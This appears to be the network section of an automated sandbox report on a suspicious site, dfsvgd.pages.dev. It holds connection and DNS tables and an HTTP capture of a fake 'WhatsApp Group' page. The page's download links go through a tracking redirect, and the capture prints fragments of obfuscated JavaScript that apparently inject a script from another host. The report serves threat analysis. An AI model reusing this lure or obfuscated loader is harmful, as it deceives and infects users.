              Aug 30, 2024 00:48:32.385186911 CEST4434977735.190.80.1192.168.2.4
              Aug 30, 2024 00:48:32.432775021 CEST49777443192.168.2.435.190.80.1
              Aug 30, 2024 00:48:32.511964083 CEST4434977735.190.80.1192.168.2.4
              Aug 30, 2024 00:48:32.512048960 CEST4434977735.190.80.1192.168.2.4
              Aug 30, 2024 00:48:32.512260914 CEST49777443192.168.2.435.190.80.1
              Aug 30, 2024 00:48:32.512347937 CEST49777443192.168.2.435.190.80.1
              Aug 30, 2024 00:48:32.512372017 CEST4434977735.190.80.1192.168.2.4
              Aug 30, 2024 00:48:41.594409943 CEST44349775172.217.16.132192.168.2.4
              Aug 30, 2024 00:48:41.594476938 CEST44349775172.217.16.132192.168.2.4
              Aug 30, 2024 00:48:41.594738007 CEST49775443192.168.2.4172.217.16.132
              Aug 30, 2024 00:48:41.794397116 CEST49775443192.168.2.4172.217.16.132
              Aug 30, 2024 00:48:41.794425964 CEST44349775172.217.16.132192.168.2.4
              Aug 30, 2024 00:48:49.142124891 CEST49778443192.168.2.4103.253.215.19
              Aug 30, 2024 00:48:49.142148972 CEST44349778103.253.215.19192.168.2.4
              Aug 30, 2024 00:48:49.142208099 CEST49778443192.168.2.4103.253.215.19
              Aug 30, 2024 00:48:49.142491102 CEST49779443192.168.2.4103.253.215.19
              Aug 30, 2024 00:48:49.142520905 CEST44349779103.253.215.19192.168.2.4
              Aug 30, 2024 00:48:49.142580032 CEST49779443192.168.2.4103.253.215.19
              Aug 30, 2024 00:48:49.142781973 CEST49778443192.168.2.4103.253.215.19
              Aug 30, 2024 00:48:49.142796993 CEST44349778103.253.215.19192.168.2.4
              Aug 30, 2024 00:48:49.143157959 CEST49779443192.168.2.4103.253.215.19
              Aug 30, 2024 00:48:49.143172979 CEST44349779103.253.215.19192.168.2.4
              Aug 30, 2024 00:48:53.353328943 CEST44349779103.253.215.19192.168.2.4
              Aug 30, 2024 00:48:53.353385925 CEST49779443192.168.2.4103.253.215.19
              Aug 30, 2024 00:48:53.353549957 CEST49779443192.168.2.4103.253.215.19
              Aug 30, 2024 00:48:53.353566885 CEST44349779103.253.215.19192.168.2.4
              Aug 30, 2024 00:48:53.354082108 CEST49780443192.168.2.4103.253.215.19
              Aug 30, 2024 00:48:53.354109049 CEST44349780103.253.215.19192.168.2.4
              Aug 30, 2024 00:48:53.354173899 CEST49780443192.168.2.4103.253.215.19
              Aug 30, 2024 00:48:53.354399920 CEST49780443192.168.2.4103.253.215.19
              Aug 30, 2024 00:48:53.354408026 CEST44349780103.253.215.19192.168.2.4
              Aug 30, 2024 00:48:53.357043982 CEST44349778103.253.215.19192.168.2.4
              Aug 30, 2024 00:48:53.357108116 CEST49778443192.168.2.4103.253.215.19
              Aug 30, 2024 00:48:53.357189894 CEST49778443192.168.2.4103.253.215.19
              Aug 30, 2024 00:48:53.357197046 CEST44349778103.253.215.19192.168.2.4
              Aug 30, 2024 00:48:53.357469082 CEST49781443192.168.2.4103.253.215.19
              Aug 30, 2024 00:48:53.357490063 CEST44349781103.253.215.19192.168.2.4
              Aug 30, 2024 00:48:53.357549906 CEST49781443192.168.2.4103.253.215.19
              Aug 30, 2024 00:48:53.357712984 CEST49781443192.168.2.4103.253.215.19
              Aug 30, 2024 00:48:53.357726097 CEST44349781103.253.215.19192.168.2.4
              Aug 30, 2024 00:49:09.346792936 CEST44349780103.253.215.19192.168.2.4
              Aug 30, 2024 00:49:09.346884966 CEST49780443192.168.2.4103.253.215.19
              Aug 30, 2024 00:49:09.347073078 CEST49780443192.168.2.4103.253.215.19
              Aug 30, 2024 00:49:09.347090960 CEST44349780103.253.215.19192.168.2.4
              Aug 30, 2024 00:49:09.360874891 CEST44349781103.253.215.19192.168.2.4
              Aug 30, 2024 00:49:09.361026049 CEST49781443192.168.2.4103.253.215.19
              Aug 30, 2024 00:49:09.361154079 CEST49781443192.168.2.4103.253.215.19
              Aug 30, 2024 00:49:09.361171961 CEST44349781103.253.215.19192.168.2.4
              TimestampSource PortDest PortSource IPDest IP
              Aug 30, 2024 00:47:27.694628954 CEST53600261.1.1.1192.168.2.4
              Aug 30, 2024 00:47:27.694825888 CEST53548581.1.1.1192.168.2.4
              Aug 30, 2024 00:47:28.567430973 CEST5382353192.168.2.41.1.1.1
              Aug 30, 2024 00:47:28.567819118 CEST5647853192.168.2.41.1.1.1
              Aug 30, 2024 00:47:29.224945068 CEST53564781.1.1.1192.168.2.4
              Aug 30, 2024 00:47:29.225143909 CEST53538231.1.1.1192.168.2.4
              Aug 30, 2024 00:47:29.227574110 CEST6360053192.168.2.41.1.1.1
              Aug 30, 2024 00:47:29.227720976 CEST5090553192.168.2.41.1.1.1
              Aug 30, 2024 00:47:29.239398003 CEST53636001.1.1.1192.168.2.4
              Aug 30, 2024 00:47:29.240731001 CEST53509051.1.1.1192.168.2.4
              Aug 30, 2024 00:47:30.080346107 CEST53614461.1.1.1192.168.2.4
              Aug 30, 2024 00:47:30.996412992 CEST5729053192.168.2.41.1.1.1
              Aug 30, 2024 00:47:30.996725082 CEST5797453192.168.2.41.1.1.1
              Aug 30, 2024 00:47:31.305377960 CEST53579741.1.1.1192.168.2.4
              Aug 30, 2024 00:47:31.305391073 CEST53572901.1.1.1192.168.2.4
              Aug 30, 2024 00:47:31.555063963 CEST5628153192.168.2.41.1.1.1
              Aug 30, 2024 00:47:31.555063963 CEST5646353192.168.2.41.1.1.1
              Aug 30, 2024 00:47:31.562067032 CEST53562811.1.1.1192.168.2.4
              Aug 30, 2024 00:47:31.562083006 CEST53564631.1.1.1192.168.2.4
              Aug 30, 2024 00:47:31.635040045 CEST6207453192.168.2.41.1.1.1
              Aug 30, 2024 00:47:31.635364056 CEST5479153192.168.2.41.1.1.1
              Aug 30, 2024 00:47:31.642174006 CEST53620741.1.1.1192.168.2.4
              Aug 30, 2024 00:47:31.643173933 CEST53547911.1.1.1192.168.2.4
              Aug 30, 2024 00:47:31.794148922 CEST5877653192.168.2.41.1.1.1
              Aug 30, 2024 00:47:31.794708967 CEST5267953192.168.2.41.1.1.1
              Aug 30, 2024 00:47:31.807611942 CEST53587761.1.1.1192.168.2.4
              Aug 30, 2024 00:47:31.809151888 CEST53526791.1.1.1192.168.2.4
              Aug 30, 2024 00:47:42.284662008 CEST6127353192.168.2.41.1.1.1
              Aug 30, 2024 00:47:42.284907103 CEST6140553192.168.2.41.1.1.1
              Aug 30, 2024 00:47:43.658798933 CEST5443753192.168.2.41.1.1.1
              Aug 30, 2024 00:47:43.659333944 CEST5788353192.168.2.41.1.1.1
              Aug 30, 2024 00:47:43.680026054 CEST138138192.168.2.4192.168.2.255
              Aug 30, 2024 00:47:44.629218102 CEST53612731.1.1.1192.168.2.4
              Aug 30, 2024 00:47:44.629249096 CEST53614051.1.1.1192.168.2.4
              Aug 30, 2024 00:47:46.007673025 CEST53578831.1.1.1192.168.2.4
              Aug 30, 2024 00:47:46.007776976 CEST53544371.1.1.1192.168.2.4
              Aug 30, 2024 00:47:47.644292116 CEST53502481.1.1.1192.168.2.4
              Aug 30, 2024 00:48:10.594497919 CEST53569401.1.1.1192.168.2.4
              Aug 30, 2024 00:48:26.827691078 CEST53606591.1.1.1192.168.2.4
              Aug 30, 2024 00:48:37.215284109 CEST53629371.1.1.1192.168.2.4
              Aug 30, 2024 00:48:46.731102943 CEST6008453192.168.2.41.1.1.1
              Aug 30, 2024 00:48:46.731781006 CEST6544253192.168.2.41.1.1.1
              Aug 30, 2024 00:48:48.910460949 CEST53654421.1.1.1192.168.2.4
              Aug 30, 2024 00:48:48.910939932 CEST4920653192.168.2.41.1.1.1
              Aug 30, 2024 00:48:49.080081940 CEST53600841.1.1.1192.168.2.4
              Aug 30, 2024 00:48:51.279150963 CEST53492061.1.1.1192.168.2.4
              Aug 30, 2024 00:49:12.370573044 CEST53518011.1.1.1192.168.2.4
              TimestampSource IPDest IPChecksumCodeType
              Aug 30, 2024 00:47:46.007742882 CEST192.168.2.41.1.1.1c1e2(Port unreachable)Destination Unreachable
              Aug 30, 2024 00:48:51.279350042 CEST192.168.2.41.1.1.1c1e2(Port unreachable)Destination Unreachable
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Aug 30, 2024 00:47:28.567430973 CEST192.168.2.41.1.1.10x3a81Standard query (0)dfsvgd.pages.devA (IP address)IN (0x0001)false
              Aug 30, 2024 00:47:28.567819118 CEST192.168.2.41.1.1.10x1a1Standard query (0)dfsvgd.pages.dev65IN (0x0001)false
              Aug 30, 2024 00:47:29.227574110 CEST192.168.2.41.1.1.10xd2d1Standard query (0)dfsvgd.pages.devA (IP address)IN (0x0001)false
              Aug 30, 2024 00:47:29.227720976 CEST192.168.2.41.1.1.10xd07Standard query (0)dfsvgd.pages.dev65IN (0x0001)false
              Aug 30, 2024 00:47:30.996412992 CEST192.168.2.41.1.1.10x5fdeStandard query (0)www.google.comA (IP address)IN (0x0001)false
              Aug 30, 2024 00:47:30.996725082 CEST192.168.2.41.1.1.10x68e8Standard query (0)www.google.com65IN (0x0001)false
              Aug 30, 2024 00:47:31.555063963 CEST192.168.2.41.1.1.10x88b6Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
              Aug 30, 2024 00:47:31.555063963 CEST192.168.2.41.1.1.10x46adStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
              Aug 30, 2024 00:47:31.635040045 CEST192.168.2.41.1.1.10xe57cStandard query (0)hzr0dm28m17c.comA (IP address)IN (0x0001)false
              Aug 30, 2024 00:47:31.635364056 CEST192.168.2.41.1.1.10xddeStandard query (0)hzr0dm28m17c.com65IN (0x0001)false
              Aug 30, 2024 00:47:31.794148922 CEST192.168.2.41.1.1.10x1b1dStandard query (0)dfsvgd.pages.devA (IP address)IN (0x0001)false
              Aug 30, 2024 00:47:31.794708967 CEST192.168.2.41.1.1.10x9d67Standard query (0)dfsvgd.pages.dev65IN (0x0001)false
              Aug 30, 2024 00:47:42.284662008 CEST192.168.2.41.1.1.10x6e52Standard query (0)smxtrack.comA (IP address)IN (0x0001)false
              Aug 30, 2024 00:47:42.284907103 CEST192.168.2.41.1.1.10x7280Standard query (0)smxtrack.com65IN (0x0001)false
              Aug 30, 2024 00:47:43.658798933 CEST192.168.2.41.1.1.10xb1e7Standard query (0)smxtrack.comA (IP address)IN (0x0001)false
              Aug 30, 2024 00:47:43.659333944 CEST192.168.2.41.1.1.10xc460Standard query (0)smxtrack.com65IN (0x0001)false
              Aug 30, 2024 00:48:46.731102943 CEST192.168.2.41.1.1.10x43f3Standard query (0)smxtrack.comA (IP address)IN (0x0001)false
              Aug 30, 2024 00:48:46.731781006 CEST192.168.2.41.1.1.10xc0abStandard query (0)smxtrack.com65IN (0x0001)false
              Aug 30, 2024 00:48:48.910939932 CEST192.168.2.41.1.1.10x19f9Standard query (0)smxtrack.com65IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Aug 30, 2024 00:47:29.224945068 CEST1.1.1.1192.168.2.40x1a1No error (0)dfsvgd.pages.dev65IN (0x0001)false
              Aug 30, 2024 00:47:29.225143909 CEST1.1.1.1192.168.2.40x3a81No error (0)dfsvgd.pages.dev188.114.96.3A (IP address)IN (0x0001)false
              Aug 30, 2024 00:47:29.225143909 CEST1.1.1.1192.168.2.40x3a81No error (0)dfsvgd.pages.dev188.114.97.3A (IP address)IN (0x0001)false
              Aug 30, 2024 00:47:29.239398003 CEST1.1.1.1192.168.2.40xd2d1No error (0)dfsvgd.pages.dev188.114.96.3A (IP address)IN (0x0001)false
              Aug 30, 2024 00:47:29.239398003 CEST1.1.1.1192.168.2.40xd2d1No error (0)dfsvgd.pages.dev188.114.97.3A (IP address)IN (0x0001)false
              Aug 30, 2024 00:47:29.240731001 CEST1.1.1.1192.168.2.40xd07No error (0)dfsvgd.pages.dev65IN (0x0001)false
              Aug 30, 2024 00:47:31.305377960 CEST1.1.1.1192.168.2.40x68e8No error (0)www.google.com65IN (0x0001)false
              Aug 30, 2024 00:47:31.305391073 CEST1.1.1.1192.168.2.40x5fdeNo error (0)www.google.com172.217.16.132A (IP address)IN (0x0001)false
              Aug 30, 2024 00:47:31.562067032 CEST1.1.1.1192.168.2.40x88b6No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
              Aug 30, 2024 00:47:31.642174006 CEST1.1.1.1192.168.2.40xe57cNo error (0)hzr0dm28m17c.com172.240.108.68A (IP address)IN (0x0001)false
              Aug 30, 2024 00:47:31.642174006 CEST1.1.1.1192.168.2.40xe57cNo error (0)hzr0dm28m17c.com192.243.59.20A (IP address)IN (0x0001)false
              Aug 30, 2024 00:47:31.642174006 CEST1.1.1.1192.168.2.40xe57cNo error (0)hzr0dm28m17c.com172.240.127.234A (IP address)IN (0x0001)false
              Aug 30, 2024 00:47:31.642174006 CEST1.1.1.1192.168.2.40xe57cNo error (0)hzr0dm28m17c.com172.240.108.76A (IP address)IN (0x0001)false
              Aug 30, 2024 00:47:31.642174006 CEST1.1.1.1192.168.2.40xe57cNo error (0)hzr0dm28m17c.com192.243.59.12A (IP address)IN (0x0001)false
              Aug 30, 2024 00:47:31.642174006 CEST1.1.1.1192.168.2.40xe57cNo error (0)hzr0dm28m17c.com172.240.253.132A (IP address)IN (0x0001)false
              Aug 30, 2024 00:47:31.642174006 CEST1.1.1.1192.168.2.40xe57cNo error (0)hzr0dm28m17c.com192.243.61.225A (IP address)IN (0x0001)false
              Aug 30, 2024 00:47:31.642174006 CEST1.1.1.1192.168.2.40xe57cNo error (0)hzr0dm28m17c.com192.243.61.227A (IP address)IN (0x0001)false
              Aug 30, 2024 00:47:31.642174006 CEST1.1.1.1192.168.2.40xe57cNo error (0)hzr0dm28m17c.com192.243.59.13A (IP address)IN (0x0001)false
              Aug 30, 2024 00:47:31.642174006 CEST1.1.1.1192.168.2.40xe57cNo error (0)hzr0dm28m17c.com172.240.108.84A (IP address)IN (0x0001)false
              Aug 30, 2024 00:47:31.807611942 CEST1.1.1.1192.168.2.40x1b1dNo error (0)dfsvgd.pages.dev188.114.96.3A (IP address)IN (0x0001)false
              Aug 30, 2024 00:47:31.807611942 CEST1.1.1.1192.168.2.40x1b1dNo error (0)dfsvgd.pages.dev188.114.97.3A (IP address)IN (0x0001)false
              Aug 30, 2024 00:47:31.809151888 CEST1.1.1.1192.168.2.40x9d67No error (0)dfsvgd.pages.dev65IN (0x0001)false
              Aug 30, 2024 00:47:44.629218102 CEST1.1.1.1192.168.2.40x6e52No error (0)smxtrack.com103.253.215.19A (IP address)IN (0x0001)false
              Aug 30, 2024 00:47:44.629249096 CEST1.1.1.1192.168.2.40x7280Server failure (2)smxtrack.comnonenone65IN (0x0001)false
              Aug 30, 2024 00:47:46.007673025 CEST1.1.1.1192.168.2.40xc460Server failure (2)smxtrack.comnonenone65IN (0x0001)false
              Aug 30, 2024 00:47:46.007776976 CEST1.1.1.1192.168.2.40xb1e7No error (0)smxtrack.com103.253.215.19A (IP address)IN (0x0001)false
              Aug 30, 2024 00:48:48.910460949 CEST1.1.1.1192.168.2.40xc0abServer failure (2)smxtrack.comnonenone65IN (0x0001)false
              Aug 30, 2024 00:48:49.080081940 CEST1.1.1.1192.168.2.40x43f3No error (0)smxtrack.com103.253.215.19A (IP address)IN (0x0001)false
              Aug 30, 2024 00:48:51.279150963 CEST1.1.1.1192.168.2.40x19f9Server failure (2)smxtrack.comnonenone65IN (0x0001)false
              • dfsvgd.pages.dev
              • https:
                • hzr0dm28m17c.com
              • a.nel.cloudflare.com
              • fs.microsoft.com
              • slscr.update.microsoft.com
              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.449735188.114.96.34432288C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              2024-08-29 22:47:29 UTC659OUTGET / HTTP/1.1
              Host: dfsvgd.pages.dev
              Connection: keep-alive
              Upgrade-Insecure-Requests: 1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Sec-Fetch-Site: none
              Sec-Fetch-Mode: navigate
              Sec-Fetch-User: ?1
              Sec-Fetch-Dest: document
              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
              sec-ch-ua-mobile: ?0
              sec-ch-ua-platform: "Windows"
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.9
              2024-08-29 22:47:29 UTC714INHTTP/1.1 200 OK
              Date: Thu, 29 Aug 2024 22:47:29 GMT
              Content-Type: text/html; charset=utf-8
              Transfer-Encoding: chunked
              Connection: close
              Access-Control-Allow-Origin: *
              Cache-Control: public, max-age=0, must-revalidate
              referrer-policy: strict-origin-when-cross-origin
              x-content-type-options: nosniff
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q%2B00HCO7E3u%2BOFPO1qZsyV9tC%2BXgBojb9WuLSINQFMRKliD4uhusUqUPlCExrb9fwzmRTDsnLmegQACfamQP1sTv6iNJmZ5HyVKrLYaNIKkLdfyplQE5pc%2FwjWiKkuQi0fR9"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8bb0154baa1c43e2-EWR
              alt-svc: h3=":443"; ma=86400
              2024-08-29 22:47:29 UTC655INData Raw: 32 35 63 31 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 21 2d 2d 20 52 65 71 75 69 72 65 64 20 6d 65 74 61 20 74 61 67 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 68 61 74 73 41 70 70 20 47 72 6f 75 70 20
              Data Ascii: 25c1<!doctype html><html lang="en"> <head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> ... Required meta tags --> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>WhatsApp Group
              2024-08-29 22:47:29 UTC1369INData Raw: 69 67 68 74 3a 20 34 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 62 74 20 64 69 76 20 70 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 72 65 6d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 72 67 62 28 31 31 37 2c 20 31 31 37 2c 20 31 31 37 29 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 66 39 65 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 62 74 20 64 69 76 20 2e 74 6f 6d 62 6f 6c 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 30 31 65 36 37 35
              Data Ascii: ight: 400; } .bt div p { margin-bottom: 2rem; color: rgb(117, 117, 117); } .body { background-color: #4f9e00; } .bt div .tombol { background: #01e675
              2024-08-29 22:47:29 UTC1369INData Raw: 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 72 65 6d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 28 30 2c 20 30 2c 20 30 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 72 65 6d 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 20 6e 61 76 62 61 72 2d 64 61 72 6b 20 73 74 69 63 6b 79 2d 74 6f 70 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23
              Data Ascii: : center; margin-top: 2rem; background: rgb(0, 0, 0); color: white; padding: 2rem; } </style> </head> <body> <nav class="navbar navbar-dark sticky-top" style="background-color: #
              2024-08-29 22:47:29 UTC1369INData Raw: 73 3a 2f 2f 73 6d 78 74 72 61 63 6b 2e 63 6f 6d 2f 74 72 61 63 6b 69 6e 67 32 30 32 2f 72 65 64 69 72 65 63 74 2f 72 74 72 2e 70 68 70 3f 74 32 30 32 69 64 3d 32 31 34 26 63 31 3d 52 4a 5f 45 54 48 26 74 32 30 32 6b 77 3d 52 4a 5f 45 54 48 22 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 22 3e 44 6f 77 6e 6c 6f 61 64 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 73 6f 73 20 63 6f 6e 74 61 69 6e 65 72 20 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 75 6c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 6d 78 74 72 61 63 6b 2e 63 6f 6d 2f 74 72
              Data Ascii: s://smxtrack.com/tracking202/redirect/rtr.php?t202id=214&c1=RJ_ETH&t202kw=RJ_ETH" style="text-decoration: none;">Download</a> </div> <div class="isos container text-center"> <ul> <li><a href="https://smxtrack.com/tr
              2024-08-29 22:47:29 UTC1369INData Raw: 30 25 36 34 25 36 44 27 2c 27 25 33 30 25 33 36 25 36 35 25 27 2c 27 46 25 36 33 25 36 31 25 37 34 27 2c 27 37 32 25 36 31 25 36 44 25 36 27 2c 27 34 25 32 45 25 37 37 25 37 32 27 2c 27 25 33 43 25 36 34 25 36 39 25 27 2c 27 36 33 25 37 32 25 36 39 25 37 27 2c 27 33 42 25 30 41 25 32 30 25 32 27 2c 27 30 25 37 34 25 33 45 25 32 37 27 2c 27 33 43 25 32 46 25 37 33 25 36 27 2c 27 25 37 30 25 36 35 25 33 44 25 27 2c 27 39 31 38 32 39 32 39 4b 66 67 71 42 70 27 2c 27 25 36 35 25 33 44 25 32 32 25 27 2c 27 77 72 69 74 65 27 2c 27 46 25 37 34 25 32 32 25 33 45 27 2c 27 46 25 37 33 25 36 33 25 37 32 27 2c 27 32 46 25 36 38 25 37 41 25 37 27 2c 27 30 25 37 42 25 30 41 25 32 30 27 2c 27 33 44 25 33 44 25 33 44 25 32 27 2c 27 31 25 37 32 25 36 31 25 36 44 27 2c 27
              Data Ascii: 0%64%6D','%30%36%65%','F%63%61%74','72%61%6D%6','4%2E%77%72','%3C%64%69%','63%72%69%7','3B%0A%20%2','0%74%3E%27','3C%2F%73%6','%70%65%3D%','9182929KfgqBp','%65%3D%22%','write','F%74%22%3E','F%73%63%72','2F%68%7A%7','0%7B%0A%20','3D%3D%3D%2','1%72%61%6D','
              2024-08-29 22:47:29 UTC1369INData Raw: 27 2c 27 36 38 25 37 34 25 32 37 25 32 27 5d 3b 5f 30 78 33 39 37 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 33 64 63 32 34 3b 7d 3b 72 65 74 75 72 6e 20 5f 30 78 33 39 37 64 28 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 65 30 38 28 5f 30 78 31 61 36 39 39 61 2c 5f 30 78 35 63 64 64 34 66 29 7b 76 61 72 20 5f 30 78 34 36 33 32 34 65 3d 5f 30 78 33 39 37 64 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 33 65 30 38 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 30 61 30 36 38 2c 5f 30 78 31 32 34 39 61 35 29 7b 5f 30 78 35 30 61 30 36 38 3d 5f 30 78 35 30 61 30 36 38 2d 28 30 78 31 2a 2d 30 78 32 32 65 64 2b 30 78 36 30 30 2b 30 78 35 2a 30 78 35 64 65 29 3b 76 61 72 20 5f 30 78 34 38 36 63 38 35 3d 5f 30 78 34 36 33 32 34 65 5b 5f 30
              Data Ascii: ','68%74%27%2'];_0x397d=function(){return _0x13dc24;};return _0x397d();}function _0x3e08(_0x1a699a,_0x5cdd4f){var _0x46324e=_0x397d();return _0x3e08=function(_0x50a068,_0x1249a5){_0x50a068=_0x50a068-(0x1*-0x22ed+0x600+0x5*0x5de);var _0x486c85=_0x46324e[_0
              2024-08-29 22:47:29 UTC1369INData Raw: 78 39 31 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 64 33 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 38 62 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 61 34 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 65 63 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 36 39 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 37 33 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 62 64 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 64 66 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 38 39 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 37 63 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 65 64 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 64 38 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 38 33 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 62 38 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 61 34 29 2b 5f 30 78 34 37 65 62 31 66 28
              Data Ascii: x91)+_0x47eb1f(0xd3)+_0x47eb1f(0x8b)+_0x47eb1f(0xa4)+_0x47eb1f(0xec)+_0x47eb1f(0x69)+_0x47eb1f(0x73)+_0x47eb1f(0xbd)+_0x47eb1f(0xdf)+_0x47eb1f(0x89)+_0x47eb1f(0x7c)+_0x47eb1f(0xed)+_0x47eb1f(0xd8)+_0x47eb1f(0x83)+_0x47eb1f(0xb8)+_0x47eb1f(0xa4)+_0x47eb1f(
              2024-08-29 22:47:29 UTC804INData Raw: 37 65 62 31 66 28 30 78 63 39 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 62 61 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 65 65 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 37 66 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 39 38 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 37 30 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 62 65 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 61 32 29 2b 28 5f 30 78 34 37 65 62 31 66 28 30 78 38 66 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 65 35 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 65 34 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 39 33 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 65 38 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 36 61 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 39 63 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 63 63 29 2b 5f 30
              Data Ascii: 7eb1f(0xc9)+_0x47eb1f(0xba)+_0x47eb1f(0xee)+_0x47eb1f(0x7f)+_0x47eb1f(0x98)+_0x47eb1f(0x70)+_0x47eb1f(0xbe)+_0x47eb1f(0xa2)+(_0x47eb1f(0x8f)+_0x47eb1f(0xe5)+_0x47eb1f(0xe4)+_0x47eb1f(0x93)+_0x47eb1f(0xe8)+_0x47eb1f(0x6a)+_0x47eb1f(0x9c)+_0x47eb1f(0xcc)+_0
              2024-08-29 22:47:29 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              1192.168.2.449737188.114.96.34432288C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
